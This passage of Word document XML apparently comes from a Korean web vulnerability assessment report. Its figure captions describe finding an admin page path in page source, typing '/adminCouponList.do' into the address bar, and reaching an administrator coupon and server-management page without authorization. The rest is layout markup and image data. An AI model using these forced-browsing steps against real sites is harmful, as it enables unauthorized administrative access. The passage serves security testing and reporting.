LnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAAL&#10;AAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDyW2vQsAIAAJIFAAAO&#10;AAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQB7XHF74AAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAAAoFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAFwYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00E72D99">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EE8485D" wp14:editId="4FF7CC0E">
            <wp:extent cx="4572000" cy="2845794"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="12065"/>
            <wp:docPr id="3" name="그림 52">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B98C1DB6-6A81-4A38-ACF3-12C167F51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2">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B98C1DB6-6A81-4A38-ACF3-12C167F5127B}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId17"/>
                    <a:srcRect l="-77" t="-160" r="26796" b="59602"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="28457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29154B" w14:textId="28F7952D" w:rsidR="008F251F" w:rsidRDefault="00DE3B69" w:rsidP="008F251F">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="256" w:name="_Toc206630350"/>
      <w:bookmarkStart w:id="257" w:name="_Toc206630488"/>
      <w:bookmarkStart w:id="258" w:name="_Toc209094576"/>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w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3B69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>페이지</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3B69">
        <w:t xml:space="preserve"> 소스에서 “/adminCoupon</w:t>
      </w:r>
      <w:r w:rsidR="00A26F95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00A26F95">
        <w:t>etailForm</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3B69">
        <w:t>.do” 페이지 경로 발견</w:t>
      </w:r>
      <w:bookmarkEnd w:id="256"/>
      <w:bookmarkEnd w:id="257"/>
      <w:bookmarkEnd w:id="258"/>
    </w:p>
    <w:p w14:paraId="46765E46" w14:textId="1291F930" w:rsidR="008F251F" w:rsidRDefault="008F251F" w:rsidP="008F251F">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252503FF" w14:textId="7336345D" w:rsidR="008F251F" w:rsidRDefault="00F54849" w:rsidP="008F251F">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="259" w:name="_Toc206630351"/>
      <w:bookmarkStart w:id="260" w:name="_Toc206630489"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251641856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BCC86A1" wp14:editId="705C0987">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2004060</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>311785</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1644650" cy="177800"/>
                <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474569" name="직사각형 1951474569"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1644650" cy="177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D30C5" id="직사각형 1951474569" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:157.8pt;margin-top:24.55pt;width:129.5pt;height:1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yKuAIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG0mGbCdG5MBI4KJA&#10;kARNiqxpirIEUByWpC27u/QOBXqDbrrouYr0Dh1Snxhp0EVRL2iOZuYN583n9GxXS7IVxlagMpoc&#10;xZQIxSGv1DqjH+6Wb44psY6pnElQIqN7YenZ/PWr00bPxAhKkLkwBEGUnTU6o6VzehZFlpeiZvYI&#10;tFCoLMDUzKFo1lFuWIPotYxGcTyJGjC5NsCFtfj1olXSecAvCsHddVFY4YjMKL7NhdOEc+XPaH7K&#10;ZmvDdFnx7hnsH15Rs0ph0AHqgjlGNqb6A6quuAELhTviUEdQFBUXIQfMJomfZXNbMi1CLkiO1QNN&#10;9v/B8qvtjSFVjrU7GSfpNB1PTihRrMZaPX57ePz8/eePh19fv5ADNXLWaDtD11t9YzrJ4tUTsCtM&#10;7f8xNbILPO8HnsXOEY4fk0maTsZYDo66ZDo9jkMhoidvbax7K6Am/pJRg3UM9LLtpXUYEU17Ex9M&#10;wbKSMtRSKtL4ZGLE9yoLssq9NghmvTqXhmwZtsNyGePPdwCiHZihJBV+9Dm2WYWb20vhMaR6Lwpk&#10;DPMYtRF8r4oBlnEulEtaVcly0UYbHwbrPULoAOiRC3zlgN0B9JYtSI/dvrmz964itPrg3KX+N+fB&#10;I0QG5QbnulJgXspMYlZd5Na+J6mlxrO0gnyP/WSgHTSr+bLCCl4y626YwcnCouO2cNd4FBKwUtDd&#10;KCnBfHrpu7fHhkctJQ1Oakbtxw0zghL5TuEonCRp6kc7COl4OkLBHGpWhxq1qc8Bq5/gXtI8XL29&#10;k/21MFDf41JZ+KioYopj7IxyZ3rh3LUbBNcSF4tFMMNx1sxdqlvNPbhn1Xfo3e6eGd21scMBuIJ+&#10;qtnsWTe3tt5TwWLjoKhCqz/x2vGNqyA0Tre2/K45lIPV03Kd/wYAAP//AwBQSwMEFAAGAAgAAAAh&#10;AJPjeXPfAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENkJG4sbdmWUepOgIQQ&#10;iAMMuGeN11ZrkqrJ2vL2mBMcbX/6/f3FdradGGkIrXcI6SIBQa7ypnU1wufH49UGRIjaGd15Rwjf&#10;FGBbnp8VOjd+cu807mItOMSFXCM0Mfa5lKFqyOqw8D05vh38YHXkcailGfTE4baTWZKspdWt4w+N&#10;7umhoeq4O1mEN388yO4ry17U/VOmnu1mqsdXxMuL+e4WRKQ5/sHwq8/qULLT3p+cCaJDuE5Xa0YR&#10;ljcpCAZWasmLPYJSKciykP8blD8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAdpJsirgC&#10;AACkBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAk+N5&#10;c98AAAAJAQAADwAAAAAAAAAAAAAAAAASBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AB4GAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008F251F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="162D553A" wp14:editId="15E67515">
            <wp:extent cx="4572000" cy="1307448"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="2667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778" b="50062"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="13074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59"/>
      <w:bookmarkEnd w:id="260"/>
    </w:p>
    <w:p w14:paraId="37D5AA1D" w14:textId="6630AF79" w:rsidR="00793B3A" w:rsidRDefault="008F251F" w:rsidP="00793B3A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="261" w:name="_Toc206630352"/>
      <w:bookmarkStart w:id="262" w:name="_Toc206630490"/>
      <w:bookmarkStart w:id="263" w:name="_Toc209094577"/>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w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="008F251F">
        <w:t>URL 주소창에 “/adminCouponList.do” 입력</w:t>
      </w:r>
      <w:bookmarkEnd w:id="261"/>
      <w:bookmarkEnd w:id="262"/>
      <w:bookmarkEnd w:id="263"/>
    </w:p>
    <w:p w14:paraId="67DFE5FF" w14:textId="77777777" w:rsidR="00793B3A" w:rsidRDefault="00793B3A" w:rsidP="00793B3A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB9B8E5" w14:textId="4836C1E5" w:rsidR="00793B3A" w:rsidRDefault="00395654" w:rsidP="00793B3A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="264" w:name="_Toc206630353"/>
      <w:bookmarkStart w:id="265" w:name="_Toc206630491"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251409408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77B9427C" wp14:editId="452675FA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1149741</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1183738</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="486312" cy="216877"/>
                <wp:effectExtent l="0" t="0" r="28575" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="32" name="직사각형 32"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="486312" cy="21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D3637" id="직사각형 32" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:90.55pt;margin-top:93.2pt;width:38.3pt;height:17.1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G6psQIAAJMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG0mO8xMiB0YCFwWC&#10;JGhSZE1TpCWA4rAk/esuvUOB3qCbLnquIr1Dh9QnRhp0UdQLmeTMvOF7nJnTs02jyEpYV4MuaLaX&#10;UiI0h7LWi4J+uJu9OabEeaZLpkCLgm6Fo2eT169O1yYXI6hAlcISBNEuX5uCVt6bPEkcr0TD3B4Y&#10;odEowTbM49YuktKyNaI3Khml6WGyBlsaC1w4h6cXrZFOIr6UgvtrKZ3wRBUU7+bj18bvPHyTySnL&#10;F5aZqubdNdg/3KJhtcakA9QF84wsbf0HVFNzCw6k3+PQJCBlzUXkgGyy9Bmb24oZEbmgOM4MMrn/&#10;B8uvVjeW1GVB90eUaNbgGz1+e3j8/P3nj4dfX78QPEaN1sbl6Hprbmy3c7gMhDfSNuEfqZBN1HU7&#10;6Co2nnA8HB8f7mcIz9E0yg6Pj44CZvIUbKzzbwU0JCwKavHZoppsdel869q7hFwaZrVSeM5ypcka&#10;6+4kPUhjhANVl8EajM4u5ufKkhXD15/NUvx1iXfc8BpK420CxZZUXPmtEm2C90KiQEhj1GYIpSkG&#10;WMa50D5rTRUrRZvtYDdZHxE5K42AAVniLQfsDqD3bEF67FaBzj+EiljZQ3BH/W/BQ0TMDNoPwU2t&#10;wb7ETCGrLnPr34vUShNUmkO5xfKx0PaVM3xW4wteMudvmMVGwpbD4eCv8SMV4EtBt6KkAvvppfPg&#10;j/WNVkrW2JgFdR+XzApK1DuNlX+Sjcehk+NmfHA0wo3dtcx3LXrZnAO+foZjyPC4DP5e9UtpobnH&#10;GTINWdHENMfcBeXe9ptz3w4MnEJcTKfRDbvXMH+pbw0P4EHVUKF3m3tmTVfGHuv/CvomZvmzam59&#10;Q6SG6dKDrGOpP+na6Y2dHwunm1JhtOzuo9fTLJ38BgAA//8DAFBLAwQUAAYACAAAACEALUh1Vd4A&#10;AAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPzU7DMBCE70i8g7WVuFEnFiRRGqcCJIRAHEqBuxtv&#10;k6j+iWI3CW/P9gS3Ge2n2Zlqu1jDJhxD752EdJ0AQ9d43btWwtfn820BLETltDLeoYQfDLCtr68q&#10;VWo/uw+c9rFlFOJCqSR0MQ4l56Hp0Kqw9gM6uh39aFUkO7Zcj2qmcGu4SJKMW9U7+tCpAZ86bE77&#10;s5Ww86cjN99CvOWPLyJ/tcXcTu9S3qyWhw2wiEv8g+FSn6pDTZ0O/ux0YIZ8kaaEXkR2B4wIcZ/n&#10;wA4kRJIBryv+f0P9CwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsA&#10;AAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPbcbqmxAgAAkwUAAA4A&#10;AAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAC1IdVXeAAAACwEA&#10;AA8AAAAAAAAAAAAAAAAACwUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAWBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00793B3A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34EFEAB4" wp14:editId="6F88DF5E">
            <wp:extent cx="4571187" cy="1824990"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="2286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9020"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="18253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64"/>
      <w:bookmarkEnd w:id="265"/>
    </w:p>
    <w:p w14:paraId="1A2B2CEC" w14:textId="3A831F6E" w:rsidR="00382E81" w:rsidRDefault="000C71CF" w:rsidP="00382E81">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="266" w:name="_Toc206630354"/>
      <w:bookmarkStart w:id="267" w:name="_Toc206630492"/>
      <w:bookmarkStart w:id="268" w:name="_Toc209094578"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00793B3A">
        <w:t>그림</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00793B3A">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w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="000C71CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>관리자용</w:t>
      </w:r>
      <w:r w:rsidRPr="000C71CF">
        <w:t xml:space="preserve"> 쿠폰 관리 페이지 접속, “서버관리” 클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="266"/>
      <w:bookmarkEnd w:id="267"/>
      <w:bookmarkEnd w:id="268"/>
    </w:p>
    <w:p w14:paraId="60BCDC65" w14:textId="77777777" w:rsidR="00382E81" w:rsidRDefault="00382E81" w:rsidP="00382E81">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E53AA9D" w14:textId="5CCBDD10" w:rsidR="00382E81" w:rsidRDefault="00395654" w:rsidP="00382E81">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="269" w:name="_Toc206630355"/>
      <w:bookmarkStart w:id="270" w:name="_Toc206630493"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251404288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13EC9A7D" wp14:editId="70EE1A66">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3035300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1394460</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="304800" cy="216877"/>
                <wp:effectExtent l="0" t="0" r="19050" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="25" name="직사각형 25"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="304800" cy="21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BC953" id="직사각형 25" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:239pt;margin-top:109.8pt;width:24pt;height:17.1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OzssQIAAJMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDch6c+qmypqFYRU&#10;lYoW9ex47exKXo+xnWzCrbwDEm/AhQPPhco7MPb+NCoVB8QevLZn5hvPNz+nZ9takY2wrgKd09FB&#10;SonQHIpKr3L64Xbx6pgS55kumAItcroTjp7NXr44bUwmxlCCKoQlCKJd1piclt6bLEkcL0XN3AEY&#10;oVEowdbM49GuksKyBtFrlYzT9DBpwBbGAhfO4e1FK6SziC+l4P6dlE54onKKb/NxtXFdhjWZnbJs&#10;ZZkpK949g/3DK2pWaXQ6QF0wz8jaVn9A1RW34ED6Aw51AlJWXMQYMJpR+iSam5IZEWNBcpwZaHL/&#10;D5Zfba4tqYqcjqeUaFZjjh6+3T98/v7zx/2vr18IXiNHjXEZqt6Ya9udHG5DwFtp6/DHUMg28rob&#10;eBVbTzhevk4nxymyz1E0Hh0eHx0FzOTR2Fjn3wioSdjk1GLaIptsc+l8q9qrBF8aFpVSeM8ypUmD&#10;dXeSTtNo4UBVRZAGobOr5bmyZMMw+4tFil/neE8Nn6E0viaE2AYVd36nROvgvZBIEIYxbj2E0hQD&#10;LONcaD9qRSUrROttuu+st4gxK42AAVniKwfsDqDXbEF67JaBTj+YiljZg3EX+t+MB4voGbQfjOtK&#10;g30uMoVRdZ5b/Z6klprA0hKKHZaPhbavnOGLCjN4yZy/ZhYbCZOOw8G/w0UqwExBt6OkBPvpufug&#10;j/WNUkoabMycuo9rZgUl6q3Gyj8ZTSahk+NhMj0a48HuS5b7Er2uzwGzP8IxZHjcBn2v+q20UN/h&#10;DJkHryhimqPvnHJv+8O5bwcGTiEu5vOoht1rmL/UN4YH8MBqqNDb7R2zpitjj/V/BX0Ts+xJNbe6&#10;wVLDfO1BVrHUH3nt+MbOj4XTTakwWvbPUetxls5+AwAA//8DAFBLAwQUAAYACAAAACEAS/dBSeAA&#10;AAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPzU7DMBCE70i8g7VI3KhTQ5MQ4lSAhBAVB2jL3Y23&#10;SVT/RLGbhLdnOcFxZ0cz35Tr2Ro24hA67yQsFwkwdLXXnWsk7HcvNzmwEJXTyniHEr4xwLq6vChV&#10;of3kPnHcxoZRiAuFktDG2Bech7pFq8LC9+jod/SDVZHOoeF6UBOFW8NFkqTcqs5RQ6t6fG6xPm3P&#10;VsKHPx25+RJikz29iuzN5lMzvkt5fTU/PgCLOMc/M/ziEzpUxHTwZ6cDMxLuspy2RAlieZ8CI8dK&#10;pKQcSFnd5sCrkv/fUP0AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAA&#10;CwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA9Yzs7LECAACTBQAA&#10;DgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAS/dBSeAAAAAL&#10;AQAADwAAAAAAAAAAAAAAAAALBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABgGAAAA&#10;AA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00382E81">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47C82754" wp14:editId="7977A1A1">
            <wp:extent cx="4572000" cy="1951474"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="1079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78" b="25463"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1951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69"/>
      <w:bookmarkEnd w:id="270"/>
    </w:p>
    <w:p w14:paraId="50AFBEA5" w14:textId="5E87EE21" w:rsidR="002621B4" w:rsidRDefault="00382E81" w:rsidP="002621B4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="271" w:name="_Toc206630356"/>
      <w:bookmarkStart w:id="272" w:name="_Toc206630494"/>
      <w:bookmarkStart w:id="273" w:name="_Toc209094579"/>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w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00382E81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“확인”</w:t>
      </w:r>
      <w:r w:rsidRPr="00382E81">
        <w:t xml:space="preserve"> 클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="271"/>
      <w:bookmarkEnd w:id="272"/>
      <w:bookmarkEnd w:id="273"/>
    </w:p>
    <w:p w14:paraId="699FDFE6" w14:textId="77777777" w:rsidR="002621B4" w:rsidRDefault="002621B4" w:rsidP="002621B4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F1BEA4" w14:textId="3CED4614" w:rsidR="002621B4" w:rsidRDefault="00395654" w:rsidP="002621B4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="274" w:name="_Toc206630357"/>
      <w:bookmarkStart w:id="275" w:name="_Toc206630495"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251414528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75A63DF6" wp14:editId="7D8090F3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1085264</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>318476</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4378129" cy="351301"/>
                <wp:effectExtent l="0" t="0" r="22860" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="33" name="직사각형 33"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4378129" cy="3513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FC879" id="직사각형 33" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:85.45pt;margin-top:25.1pt;width:344.75pt;height:27.6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b2swIAAJQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG0n+NIkQOTASuCgQ&#10;JEGTImuaIi0BFMmStGV3l94hQG/QTRc9V5HeoUNSUow06KKoFzLJmXnD9zgzJ6fbRqANM7ZWssDZ&#10;QYoRk1SVtVwV+OPt4s0RRtYRWRKhJCvwjll8Onv96qTVORupSomSGQQg0uatLnDlnM6TxNKKNcQe&#10;KM0kGLkyDXGwNaukNKQF9EYkozR9m7TKlNooyqyF0/NoxLOAzzmj7opzyxwSBYa7ufA14bv032R2&#10;QvKVIbqqaXcN8g+3aEgtIekAdU4cQWtT/wHV1NQoq7g7oKpJFOc1ZYEDsMnSZ2xuKqJZ4ALiWD3I&#10;ZP8fLL3cXBtUlwUejzGSpIE3evx2//jl+88f97++PiA4Bo1abXNwvdHXpttZWHrCW24a/w9U0Dbo&#10;uht0ZVuHKBxOxodH2egYIwq28TQbp5kHTZ6itbHuHVMN8osCG3i3ICfZXFgXXXsXn0yqRS0EnJNc&#10;SNRC4R2n0zREWCXq0lu90ZrV8kwYtCHw/ItFCr8u8Z4bXENIuI3nGFmFldsJFhN8YBwUAh6jmMHX&#10;JhtgCaVMuiyaKlKymG26n6yPCJyFBECPzOGWA3YH0HtGkB47KtD5+1AWSnsI7qj/LXiICJmVdENw&#10;U0tlXmImgFWXOfr3IkVpvEpLVe6gfoyKjWU1XdTwghfEumtioJOg52A6uCv4cKHgpVS3wqhS5vNL&#10;594fChysGLXQmQW2n9bEMIzEewmlf5xNJr6Vw2YyPRzBxuxblvsWuW7OFLx+BnNI07D0/k70S25U&#10;cwdDZO6zgolICrkLTJ3pN2cuTgwYQ5TN58EN2lcTdyFvNPXgXlVfobfbO2J0V8YOGuBS9V1M8mfV&#10;HH19pFTztVO8DqX+pGunN7R+KJxuTPnZsr8PXk/DdPYbAAD//wMAUEsDBBQABgAIAAAAIQAfJQRS&#10;3gAAAAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsqI1FmhDiVICEEKgLKLB3&#10;42kS1Y8odpPw9wwrWF7doztnqs3iLJtwjH3wCq5XAhj6Jpjetwo+P56uCmAxaW+0DR4VfGOETX1+&#10;VunShNm/47RLLaMRH0utoEtpKDmPTYdOx1UY0FN3CKPTieLYcjPqmcad5VKINXe693Sh0wM+dtgc&#10;dyen4C0cD9x+SfmaPzzL/MUVczttlbq8WO7vgCVc0h8Mv/qkDjU57cPJm8gs5VzcEqogExIYAcVa&#10;3ADbUyOyDHhd8f8v1D8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAA&#10;CwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA7d4G9rMCAACUBQAA&#10;DgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uy